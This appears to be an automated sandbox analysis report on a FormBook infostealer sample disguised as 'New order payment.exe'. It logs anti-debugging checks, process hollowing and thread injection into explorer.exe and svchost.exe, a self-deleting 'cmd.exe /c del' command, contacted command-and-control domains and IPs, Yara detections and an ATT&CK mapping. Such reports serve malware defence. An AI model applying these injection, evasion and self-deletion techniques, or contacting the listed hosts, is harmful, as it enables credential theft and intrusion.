          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E131B mov eax, dword ptr fs:[00000030h]14_2_038E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382DB40 mov eax, dword ptr fs:[00000030h]14_2_0382DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F8B58 mov eax, dword ptr fs:[00000030h]14_2_038F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382F358 mov eax, dword ptr fs:[00000030h]14_2_0382F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382DB60 mov ecx, dword ptr fs:[00000030h]14_2_0382DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]14_2_03853B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]14_2_03853B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]14_2_0385D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]14_2_0385D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]14_2_038252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]14_2_038252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]14_2_038252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]14_2_038252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]14_2_038252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]14_2_0383AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]14_2_0383AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385FAB0 mov eax, dword ptr fs:[00000030h]14_2_0385FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852ACB mov eax, dword ptr fs:[00000030h]14_2_03852ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852AE4 mov eax, dword ptr fs:[00000030h]14_2_03852AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03838A0A mov eax, dword ptr fs:[00000030h]14_2_03838A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]14_2_03825210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov ecx, dword ptr fs:[00000030h]14_2_03825210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]14_2_03825210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]14_2_03825210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]14_2_0382AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]14_2_0382AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03843A1C mov eax, dword ptr fs:[00000030h]14_2_03843A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]14_2_038EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]14_2_038EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]14_2_03864A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]14_2_03864A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]14_2_0384A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]14_2_03829240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]14_2_03829240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]14_2_03829240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]14_2_03829240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EEA55 mov eax, dword ptr fs:[00000030h]14_2_038EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038B4257 mov eax, dword ptr fs:[00000030h]14_2_038B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]14_2_038DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]14_2_038DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F8A62 mov eax, dword ptr fs:[00000030h]14_2_038F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386927A mov eax, dword ptr fs:[00000030h]14_2_0386927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385A185 mov eax, dword ptr fs:[00000030h]14_2_0385A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384C182 mov eax, dword ptr fs:[00000030h]14_2_0384C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852990 mov eax, dword ptr fs:[00000030h]14_2_03852990
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]14_2_038561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]14_2_038561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]14_2_038E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]14_2_038E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]14_2_038E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]14_2_038E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A69A6 mov eax, dword ptr fs:[00000030h]14_2_038A69A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]14_2_038A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]14_2_038A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]14_2_038A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]14_2_038A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038B41E8 mov eax, dword ptr fs:[00000030h]14_2_038B41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]14_2_0382B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]14_2_0382B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]14_2_0382B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]14_2_03829100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]14_2_03829100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]14_2_03829100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03844120 mov ecx, dword ptr fs:[00000030h]14_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]14_2_0385513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]14_2_0385513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]14_2_0384B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]14_2_0384B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382C962 mov eax, dword ptr fs:[00000030h]14_2_0382C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]14_2_0382B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]14_2_0382B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829080 mov eax, dword ptr fs:[00000030h]14_2_03829080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]14_2_038A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]14_2_038A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]14_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]14_2_038520A0
          Source: C:\Users\user\Desktop\New order payment.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hanansalman.com
          Source: C:\Windows\explorer.exeDomain query: www.sejiw3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeNetwork Connect: 137.184.31.35 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.srchwithus.online
          Source: C:\Windows\explorer.exeDomain query: www.heyunshangcheng.info
          Source: C:\Windows\explorer.exeNetwork Connect: 51.210.240.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.67.234.155 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.55.103 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.christinegagnonjewellery.com
          Source: C:\Windows\explorer.exeDomain query: www.mykombuchafactory.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.salvationshippingsecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\New order payment.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 9B0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\New order payment.exeMemory written: C:\Users\user\Desktop\New order payment.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New order payment.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\New order payment.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.280314359.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510241 Sample: New order payment.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 31 www.rbrituelbeaute.com 2->31 33 www.pronogtiki.store 2->33 35 3 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 9 other signatures 2->49 11 New order payment.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\fsfowpfjd.dll, PE32 11->29 dropped 63 Injects a PE file into a foreign processes 11->63 15 New order payment.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 srchwithus.online 137.184.31.35, 49792, 80 PANDGUS United States 18->37 39 salvationshippingsecurity.com 51.210.240.92, 49755, 80 OVHFR France 18->39 41 13 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 svchost.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

